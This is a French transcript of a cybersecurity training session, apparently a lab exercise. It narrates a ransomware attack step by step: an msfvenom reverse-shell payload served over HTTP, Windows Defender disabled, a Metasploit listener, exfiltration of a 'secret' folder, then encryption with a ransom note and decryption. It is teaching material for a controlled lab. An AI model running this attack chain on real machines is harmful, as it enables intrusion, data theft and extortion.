qu'est-ce qu'on va faire? On va cloner donc l'outil. Sauf que au niveau de mon GitHub, il y a un souci. Donc, il faudra que je règle ça. C'est pourquoi je vais vous faire parvenir l'outil en format JP, format rare. Donc, vous allez pouvoir télécharger ça sur votre machine Kali. Donc, vous téléchargez ça sur votre machine. Donc, si vous avez WhatsApp qui est donc installé sur votre machine, donc vous téléchargez le ransomware là-bas sur votre machine. Et là, vous allez faire un copier. Vous allez coller ça au niveau du bureau de la machine Kali. Et là, vous allez pouvoir l'utiliser. Je vais vous montrer tout à l'heure. Donc, vous allez faire une double extraction. Pourquoi? Parce que c'est un fichier aussi qui est facilement détectable donc, par les antivirus. Pourquoi? Parce que c'est un fichier malveillant. Donc, c'est pourquoi j'ai les IP deux fois pour que ça puisse tenir au niveau de la machine physique. Donc, il faudra faire une double extraction. Et là, vous aurez les fichiers qui sont là. Donc, vous aurez ici 4 fichiers. Donc, ici, vous aurez l'HA ransom.bat. Donc, ça, c'est le ransomware qui va vous permettre de chiffrer les fichiers donc, de la victime. Vous aurez ici le HA-decrypt.bat. Donc, ici, on suppose que la cible va payer la rançon. Donc, voici le fichier qui va permettre de déchiffrer donc, les fichiers chiffrés. On a aussi deux README, donc ça vous permet de comprendre comment utiliser l'outil. Donc, le premier README, c'est un README en français et l'autre, c'est un README en anglais. Donc, ce sont des fichiers qui vous permettent de savoir comment vous allez pouvoir utiliser l'outil. Maintenant, ici, vous allez pouvoir donc faire un clic droit, ouvrir un terminal à l'intérieur de ce dossier-là. Pourquoi? Parce qu'on va donc transférer, copier donc ces deux fichiers-là. Donc, on doit envoyer à la cible. Là, ça rançon et là, ça decrypte. Donc, on va copier ça et on va mettre ça au niveau du dossier Home Kali. Donc, on va envoyer donc à notre cible. Donc, c'est ça qu'on est en train de faire ici. Donc, ici, on copie tous les fichiers qui ont l'extension .bat ici. Donc, comme c'est ces deux fichiers-là, donc ça veut dire qu'on copie ces deux fichiers-là vers le dossier Home Kali. Et une fois au niveau de ce dossier-là, comme on a donc une session m'interpréteur sur la cible ici, donc ici on va se déplacer sur le bureau parce que là-bas, c'est là-bas où il y a donc le fichier
à chiffrer, donc le fichier secret. Donc si on se déplace sur le bureau, on met pwd, là on est sur le bureau desktop. Si on met ls, donc là on a notre cible, notre dossier cible qui est le dossier secret. Donc ici on se déplace sur le dossier secret avec la commande cd. Si on met dire pour lister le contenu, donc là vous allez voir qu'on a des images et des fichiers pdf qui sont sur ce dossier-là. Maintenant, après le chiffrement, vous allez voir que ces fichiers-là seront illisibles du côté de la cible. Maintenant, comme on est ici, on a une section interpréteur aussi. On peut directement uploader notre ransomware sur le dossier secret. Pourquoi? Parce qu'on est placé à présent sur le dossier secret. Donc, si on met un pwd, vous allez voir qu'on est sur le dossier secret. Donc, on upload notre fichier qui va nous permettre de chiffrer, donc qui est là à ransom.bat. Donc, on met upload suivi du chemin complet du fichier, qui est ici home.kali à ransom.bat. Maintenant, si on met ls, donc vous allez voir notre ransomware qui est là. Maintenant, on se met en mode shell, donc on exécute la commande shell. Et là, on est en mode shell cmd. Et pour exécuter le fichier, donc c'est simple. Donc là, on met un dire encore pour voir le contenu du dossier secret. On voit toujours notre ransomware qui est là. Et à partir de là, qu'est-ce qu'on fait? Donc, on exécute juste donc le ransomware, le ransom.bat. Donc, on met juste le nom du fichier ici. Et là, vous allez voir que le chiffrement va démarrer. Maintenant, la durée du chiffrement va dépendre donc de la taille des fichiers qui se trouvent sur le dossier secret. Donc, s'il y a énormément de fichiers et dossiers, donc là, ça peut prendre du temps. Mais s'il n'y a pas beaucoup de fichiers, donc le chiffrement se fait en une seconde. Hein. Et là, si on met un dire maintenant, comme on a chiffré, vous allez voir que les fichiers ne sont plus lisibles. Donc, ils ont une autre extension qui est l'extension .enc. Donc, c'est une double extension, quoi. On a l'extension .enc ici. Et là, en même temps, on a un fichier note qui est là, un fichier note.txt. Comme je l'ai dit tantôt, de l'instant que les attaquants chiffrent donc vos fichiers, ils vous laissent un fichier note. Donc, c'est l'exécution donc du ransomware qui a créé tout ça. Donc, il a chiffré les fichiers. En même temps, il a laissé un fichier donc note.txt. Maintenant, ce fichier note.txt contient donc les informations sur l'attaquant. Et là, vous allez pouvoir entrer en contact avec l'attaquant. Et il va vous dire donc la manière dont vous allez faire pour payer la rançon. Et une fois la rançon payée, donc on suppose qu'il va vous envoyer le fichier de déchiffrement. Et s'il vous envoie le fichier de déchiffrement, vous allez pouvoir donc déchiffrer vos fichiers et donc pouvoir les utiliser. Donc voici les fichiers, sont chiffrés. Donc si on met un double clic pour ouvrir, vous allez voir qu'on n'aura pas donc des fichiers lisibles, quoi. Maintenant, voici le note.txt qui est là. Donc il contient donc, comme je l'ai dit tantôt, les informations sur l'attaquant. Donc souvent, ça sera une adresse mail que vous allez contacter. Maintenant, si vous ouvrez le fichier note.txt, vous avez ce message-là. Attention, tous les fichiers de ce dossier ont été chiffrés. Pour obtenir le fichier de déchiffrement ici, au lieu de décryptage, déchiffrement, c'est ce que je devais mettre ici. Veuillez contacter donc. Il met l'adresse IP, l'adresse mail du moins. Ici, bon, comme c'était une simulation, j'ai mis une fausse adresse mail, quoi. J'ai mis akamed@akamed.com. Maintenant, ici, ils vont vous contacter de cette adresse mail. On suppose que la cible a contacté l'attaquant, il a payé la rançon. Et là, on passe au déchiffrement. Donc, comme on avait créé deux fichiers, un fichier pour le chiffrement et un autre fichier pour le déchiffrement. Donc là, on va uploader encore. On se remet en mode interpréteur. On upload le fichier decrypt.bat qui va nous permettre maintenant de déchiffrer donc les fichiers qui étaient chiffrés précédemment. Maintenant, ici, on se remet toujours en mode shell pour exécuter le fichier decrypt.bat pour déchiffrer les fichiers. Donc, on se remet en mode shell. Là, on est en mode shell cmd. Et là, comme on a déjà uploadé les fichiers de déchiffrement, on l'exécute direct. Et là, vous allez voir que les fichiers seront déchiffrés. Si on met un dir ici, vous allez voir que les fichiers ont retrouvé donc leur extension d'origine. Comme ça, ils sont devenus donc à nouveau lisibles. Donc, on revient sur la machine Windows et là, vous allez voir que les fichiers sont revenus donc à leur état normal. Donc là, vous allez pouvoir lire ou bien afficher vos fichiers. Bon, c'est ça, donc l'attaque par ransomware.
On passe maintenant à la partie pratique. C'est bon pour tout le monde? Est-ce que c'est bon? Vous êtes là? Oui, c'est bon, on peut continuer, hein. Oui, oui, C'est bon, Abdelaziz, ouais, ouais, voilà, c'est bon. Alpha, c'est bon. D'accord, Abdelaziz, c'est bon. Donc, vous pouvez aller prier. Vous allez nous reprendre après. Donc, il y aura aussi l'enregistrement qui est disponible, hein. Donc, à la fin, donc, vous allez pouvoir donc reprendre la session. Et vous aurez aussi en même temps les fichiers, hein, pour la pratique. Donc, on continue. Donc, ici, qu'est-ce qu'on va faire dans un premier temps? Comme on l'a vu au niveau du TP, on va créer donc notre fichier malveillant qui va nous permettre d'avoir un accès initial. Donc, comme on l'a vu sur la présentation PowerPoint, donc il faudra avoir un accès initial sur la machine cible pour pouvoir exécuter le ransomware. Maintenant, pour cela, on utilise la commande MSF Venom. Donc, ça sont des choses qu'on a déjà faites ici, hein. Donc, -p, ici, on met le type de payload qui est Windows Meterpreter Reverse TCP. On a aussi LOS pour mettre l'IP donc de la machine Kali. Le L port donc pour mettre le port d'écoute. Donc ici, on va changer. On va mettre le 4444 ici comme port d'écoute. Et là, -f, donc on donne le format du fichier. Donc on va un fichier exécutable en -ex. -o, donc on donne un nom à ce fichier. Donc ici, on va l'appeler ransom, comme ça, ransom.exe. Donc et là, si on met entrée, donc notre fichier malveillant sera créé. Donc là, on est en train de créer le fichier malveillant qui va nous permettre d'avoir un accès initial sur la machine cible. Donc ici, si vous regardez bien, le fichier est créé. Et là, on utilise notre technique habituelle pour faire parvenir ça à la cible. Donc ici, on va créer un serveur web grâce à Python, donc ce qui va exposer donc ce dossier sur le réseau. Donc on pourra, à partir de l'adresse IP de la machine Kali suivi du port 8080 ici, sur la machine Windows, récupérer le fichier ransom.exe qui est là. Donc on bascule sur la machine Windows. Maintenant ici, il faudra vous assurer que la protection antivirale est désactivée. Donc vous mettez sécurité ici pour voir le Windows Defender pour voir si c'est actif. Si c'est activé, donc vous allez désactiver ça. Pourquoi? Parce que c'est la condition pour que ça marche. Donc la protection en temps réel, on désactive. Comme ça. Donc sinon, si on télécharge le fichier automatiquement, il sera détruit. Donc ici, on ouvre un navigateur. Donc là, on va mettre l'IP de la machine Windows, de la machine Kali du moins, suivi du port 8080. Et là, automatiquement, on aura accès au dossier donc qui a été exposé, c'est-à-dire le dossier Kali. Donc c'est là où est créé donc notre fichier ransom.exe, donc qui va nous permettre donc de prendre le contrôle de la machine Windows. Donc ici, on télécharge le fichier ransom.exe, donc qui est là. Donc on met juste un clic pour télécharger. Donc là, il faudra qu'on conserve ça. Donc clique ici sur les 3 points. On clique sur conserver. Allez sur le petit triangle vers le bas, conserver quand même pour garder notre fichier ransom.exe qui est là. Donc on va sur téléchargement, on a notre fichier ransom.exe qui est là. Maintenant, avant de l'exécuter, il faudra lancer l'écoute, sinon vous n'allez pas recevoir une connexion reverse. Maintenant, pour lancer l'écoute, on va le faire avec une seule ligne de commande. Donc, on ne va pas lancer Metasploit, ensuite utiliser useExploit multi-handler, mettre cette LOS, mettre cette LPort, ensuite mettre exploit, mettre le payload aussi. Tout ça, on va le faire avec une seule ligne de commande. Donc, on utilise la commande MSF console maintenant -q -x. Donc, on met l'écoute, le listener ici, useExploit multi-handler. Ensuite, on spécifie le type de payload. Donc, c'est le Windows Meterpreter. Donc, c'est le payload qu'on a utilisé
lors de la création du fichier malveillant qui est là. Ensuite, ici, on met cet host, on met l'IP de la machine Kali. Ici, c'est le 192.168.131.155. Cet L-port, on met le port qu'on a utilisé lors de la création du fichier malveillant ici, qui est le 4444. Et là, on met un exploit pour lancer l'écoute. Donc, on met exploit ici, on patiente. On attend que l'écoute se lance. Voilà. Dès l'instant que vous avez ça, static reverse TCP handler, donc ça veut dire que l'écoute est lancée. Donc, on revient sur la machine Windows. On double-clique sur le fichier rançon. Donc, ça sont des choses qu'on a déjà faites ici. Hein. Et là, si on met exécuter quand même, vous allez voir qu'on récupère une session interprétée sur la machine Windows. Donc, si on met sysinfo, donc là, vous avez les informations sur la machine Windows ici. Donc, on a le nom de la machine, computer, l'OS, donc c'est une machine Windows 10. Donc, l'architecture, c'est du 64 bits, la langue française. Domaine, c'est du workgroup. Pourquoi? Parce que c'est pas encore intégré en domaine. Et là, on a un shell en type, donc 64 bits. 32 bits, dis-moi. Donc là, si c'est bon, on va maintenant, normalement ici, vous devrez donc exécuter la commande suivante. Donc, si le GitHub est rétabli, vous allez avoir donc le fichier. Donc, vous devrez exécuter cette commande-là. Mais comme je l'ai dit tantôt ici, mon GitHub rencontre actuellement donc des difficultés. Donc, je vous enverrai donc le ransomware sous format zippé. Donc, moi, je l'ai déjà sur ma machine Kali, ici. Ça est là. Voici le ransomware. Maintenant, on va extraire. On met un clic droit. Dès l'instant que vous recevez ça et que vous copiez ça sur votre machine Kali, sur le bureau de votre machine Kali, vous faites les mêmes opérations ici. Donc, vous faites un clic droit. Donc, vous venez sur Extract here. Donc, ça veut dire que vous allez extraire le contenu du fichier RAR ici. Donc, vous avez l'outil qui est là. Donc, une fois extrait, donc c'est ça qu'on a. Le dossier est là. Et là, comme je l'ai dit tantôt, c'est une double, on l'a zippé ça 2 fois. Donc, c'est pourquoi il faudra faire une double extraction. Donc, là, on remet un clic droit ici. Extract here ici. Ça va nous permettre donc maintenant d'extraire. Et là, on a accès aux fichiers qui sont là. On a là ça decrypt, là ça rançon qui va nous permettre de faire l'attaque. Et là, ça decrypt qui va nous permettre donc de déchiffrer donc les fichiers une fois donc la rançon payée. Et là, on a deux readme, un readme en anglais, un readme en français qui vont permettre de savoir donc comment utiliser l'outil. Maintenant ici, on va mettre un clic droit, on ouvre un terminal ici. Donc ça veut dire ouvrir le terminal sur le dossier où je me trouve. Donc là, si je mets ls, vous allez voir les fichiers qui sont là. Maintenant, on va les copier vers donc le dossier Kali. Donc on met cp point donc on met comme ça. Donc cp point on met étoile point bat. Donc ça veut dire copiement tous les fichiers qui ont l'extension .bat qui se trouvent sur ce dossier là. Et là, mets-le-moi au niveau du dossier home Kali, comme ça. Si je mets entrée, donc la copie sera effectuée. Donc tout ce qui est fichier avec une extension .bat ici sera copié sur le dossier home Kali. Donc ici, je vais me déplacer, je vais donc fermer carrément parce que j'avais déjà ouvert des terminaux ici. Donc je reviens ici. Et là, comme je mets pwd, comme je suis sur home Kali, si je mets ls, normalement, je dois avoir ces fichiers-là, de deux fichiers, donc là, ça rançon, donc les fichiers de chiffrement, et là, ça décrypte le fichier de déchiffrement. Donc, on va chercher, donc voici les deux fichiers qui sont bien copiés ici. Maintenant, on revient sur notre session, ici. Qu'est-ce qu'on va faire? Donc, on va regarder là où on se trouve, on est sur le dossier download. Donc ici, comme je l'ai dit tantôt, ce dossier-là, c'est à vous de le créer. Donc, comme on est dans un cadre de test, vous créez ce dossier secret-là, vous prenez des images, des fichiers PDF, etc. Vous mettez à l'intérieur. Voici le dossier. Maintenant, ici, je me déplace sur le bureau. Donc, je mets cd 2 points. Ça veut dire sort de ce dossier-là, qui est le dossier download. Et là, cd
desktop. Donc là, tu vas maintenant entrer au niveau du dossier desktop. Si je mets pwd, vous allez voir que je suis sur desktop. Donc ça veut dire le bureau de la machine Windows. Et là, si je mets dire pour lister le contenu, donc vous allez voir l'ensemble des fichiers et dossiers qui se trouvent sur le bureau. Donc ici, le dossier qui nous intéresse, c'est le dossier secret. Maintenant ici, il y a type, l'onglet type qui est là, qui va vous permettre de savoir si ça c'est un dossier ou bien c'est un fichier. Donc si vous avez FIL, donc pour file, ça veut dire que c'est un fichier. Si vous avez DIR pour directory, ça veut dire que c'est un dossier. Maintenant, ici, le dossier qui nous intéresse, c'est le dossier secret. On suppose que c'est un dossier extrêmement sensible qui contient des informations donc cruciales. Donc ici, on va se déplacer au niveau de ce dossier-là. Pour cela, on met la commande cd secret. Donc, ayez l'habitude de mettre tabulation. Donc, cd, vous mettez SEC tabulation. Et là, il fait autocomplétion. Là, on met entrée. Si on met dire, vous allez voir l'ensemble des fichiers et dossiers qui se trouvent sur le dossier secret. Donc là, on a une image, un fichier PDF, une image d'un fichier PDF. Donc, c'est ces fichiers-là qu'on va cibler pour les chiffrer. Maintenant, ici, on va faire une upload de notre ransomware. Donc, le ransomware de tout à l'heure qu'on avait copié sur le dossier HomeKali. Donc, on va uploader le fichier de chiffrement qui est là, le ransom.bat. Donc, pour cela, on utilise la commande upload. Donc, avant de faire l'upload de ce fichier-là, donc je peux sortir du dossier secret. Donc, comme je l'ai dit tantôt, on peut faire une double extorsion, c'est-à-dire exfiltrer les données d'abord. Donc, on va mettre un download du dossier secret. Donc, pour récupérer ça au niveau de notre machine Kali. Donc, ça se trouve pas donc sur le TP, mais vous pouvez le faire. Ça veut dire que vous récupérez d'abord les dossiers et fichiers qui se trouvent sur le dossier secret. Et là, vous gardez ça d'abord avant de chiffrer ça du côté de la victime. Donc là, si vous regardez, on a récupéré tout ce qui est fichier et dossier qui se trouve sur le dossier secret. Et là, ça se trouve au niveau de HomeKali. Donc, on revient ici sur HomeKali. Donc là, si on met ls, donc vous allez voir ces fichiers-là et ces images aussi qui sont téléchargés. Donc, on cherche, il y a beaucoup de fichiers ici. Donc, ça, c'est un fichier qui fait partie donc des fichiers téléchargés. Et ça aussi, c'est une image qui fait partie des fichiers téléchargés. Là aussi, c'est un fichier qui fait partie donc des fichiers téléchargés. Des fichiers téléchargés du moins. Donc là, on revient. Maintenant, on se déplace à nouveau sur le dossier secret, CD secret. Et là, si on met ls, toujours on a ces fichiers qui sont là. Maintenant, on va uploader notre ransomware. Ce ransomware-là, à ransom.bat, qui va nous permettre de chiffrer donc ces fichiers du côté de la victime. Maintenant, pour l'uploader, c'est simple. On utilise la commande upload. Et là, on met le chemin complet. Donc, ça se trouve sur HomeKali. Donc, on met ransom.bat. On met entrée. Et là, le ransomware est uploadé. Si on met dire ici, vous allez voir qu'on a le ransomware qui se trouve sur le fichier, sur le dossier secret. Donc, si on revient sur la machine Windows, on ouvre le dossier secret. Vous allez voir le ransomware qui est là. Maintenant, ce ransomware-là, une fois exécuté, dans un premier temps, il chiffre tous ces données-là qui sont là, donc de sorte qu'ils ne seront plus lisibles au niveau de la cible. Ensuite, il laisse un fichier note.txt donc qui contiendra donc toutes les informations sur l'attaquant que vous allez donc utiliser pour pouvoir contacter l'attaquant. En même temps, il s'auto-supprime quoi. Il se supprime. Pourquoi? Parce que s'il reste là, celui donc qui a subi l'attaque pourra l'utiliser pour faire du reverse. Donc, essayer de faire du reverse engineering pour voir est-ce qu'il n'y a pas donc possibilité donc de recréer le fichier de déchiffrement à partir de ce fichier-là. Donc, il va s'auto-supprimer. Donc, on va voir ça tout à l'heure. Donc, ici, on retient qu'on vient donc d'uploader notre ransomware qui est là. Donc, on revient sur la machine Kali. On a uploadé notre ransomware, ça est là. On l'a vu tout à l'heure sur le dossier secret qui se trouve sur la machine Windows. Et là, on va se mettre en mode shell CMD. Donc, pour cela, on exécute la commande shell. Et là, on se met en mode shell CMD. Donc, si vous ouvrez votre CMD, donc c'est cette forme-là que vous avez. Donc là, on exécute la commande dir aussi pour lister le contenu. On est toujours sur le même dossier.
Donc, vous allez voir les mêmes fichiers. Donc, le dossier secret, donc l'image, fichier PDF. Et là, le ransomware est là. Maintenant, on passe au chiffrement. Pour chiffrer, vous faites quoi? Donc, vous exécutez uniquement le ransomware. Donc, on copie le ransomware qui est là. On colle ici. Si on met entrée, donc là, le chiffrement est déjà fini. Donc, on a chiffré donc les fichiers et dossiers qui se trouvent sur le dossier secret. Donc ici, si on met encore un dir, donc qu'est-ce qu'il y a? Donc vous allez voir que les fichiers ont une autre extension qui est l'extension .enc. Donc ici, on a l'extension .enc, les fichiers sont chiffrés et là, ils ne sont plus lisibles du côté de la victime. Et là, en même temps, on a le note.txt qui a été laissé ici par l'attaquant. Donc, on a le note.txt ici qui a été laissé donc par l'attaquant ici. Donc, ce note.txt contient donc les informations sur l'attaquant. Donc, si on ouvre ça, vous allez voir donc l'ensemble des informations donc sur l'attaquant. Souvent, comme je l'ai dit tantôt, c'est une adresse mail qui est là-bas que vous allez utiliser pour contacter l'attaquant pour qu'il vous envoie donc les fichiers de déchiffrement. Donc là, on note que le ransomware a été bien exécuté et là, les fichiers sont chiffrés. Donc, on revient ici. Donc, vous allez voir que les fichiers sont devenus chiffrés. Si on ouvre, on n'aura que donc ça. Donc là, ce sont des données qu'on n'arrive plus à lire. C'est plus lisible. Donc, on va faire un clic droit, ouvrir avec. Bon, peu importe l'application qu'on va utiliser, ça ne va pas fonctionner. WordPad, par exemple, ici. Donc là, vous allez voir qu'ici, on a la même chose. On a des données qui sont chiffrées. On n'arrive plus à les lire. Donc, c'est ça qu'on a ici. Donc là aussi, on avait dit que l'attaquant laisse un fichier note.txt. Et comme je l'ai dit tantôt, il s'auto-supprime quoi. Il supprime donc les fichiers de chiffrement à sa rançon qu'on avait ici. Il exécute le ransomware, il chiffre les fichiers, il s'auto-supprime. Et là, il laisse un fichier note.txt qui est là. Donc, si on ouvre ici le fichier note.txt, qu'est-ce qu'on a? On a attention, tous les fichiers de ce dossier ont été chiffrés. Pour obtenir le fichier de décryptage, veuillez contacter l'attaque. Veuillez contacter donc l'adresse mail akamed@akamed.com. Donc ça, c'est une adresse mail donc, que j'ai créée juste comme ça pour les testants. Mais dans la vraie vie, c'est une vraie adresse mail qui sera ici. Donc vous allez l'utiliser donc pour entrer en contact avec l'attaquant. Et là, peut-être qu'il va vous envoyer donc vos fichiers de déchiffrement. Bon, c'était ça l'attaque par ransomware. Donc là, maintenant, on va se mettre dans le cas où on suppose que l'attaquant a payé, donc la cible donc a payé la rançon ici. Et là, on va passer au déchiffrement. Pratiquement, bon, c'est les mêmes opérations. Donc là, on va uploader le fichier. Donc, on va uploader donc le fichier de déchiffrement qui est HADecrypt. Donc, HADecrypt ici. HADecrypt.bat. Donc, si on met entrée là, vous allez voir que le fichier de déchiffrement est uploadé. Si on met un dir, donc vous allez voir les fichiers qui sont chiffrés toujours et qui sont là ici. Maintenant, on a le fichier de déchiffrement qui est là, HADecrypt.bat. Maintenant, on va se mettre en mode shell. Donc, on se met en mode shell CMD toujours. Et là, pour déchiffrer, on fait la même opération. Hein. On copie le fichier de déchiffrement ici. On l'exécute comme commande. Comme ça. HADecrypt.bat. On lance. Et là, le déchiffrement est fini. Si on met un dir, donc vous allez voir que les fichiers ont retrouvé leur extension d'origine. Donc là, on a le .png, le .pdf et le .png encore, le .pdf. Donc si on retourne sur la machine Windows, sur le dossier secret, là, vous allez voir que les fichiers sont maintenant lisibles. Pourquoi? Parce qu'on suppose que la cible a payé la rançon. Et là, donc, l'attaquant lui a fourni le fichier de déchiffrement. Il a déchiffré ses fichiers. Il a récupéré donc ces fichiers. Donc, c'était ça, le TP. J'espère que ça a été assez clair pour vous.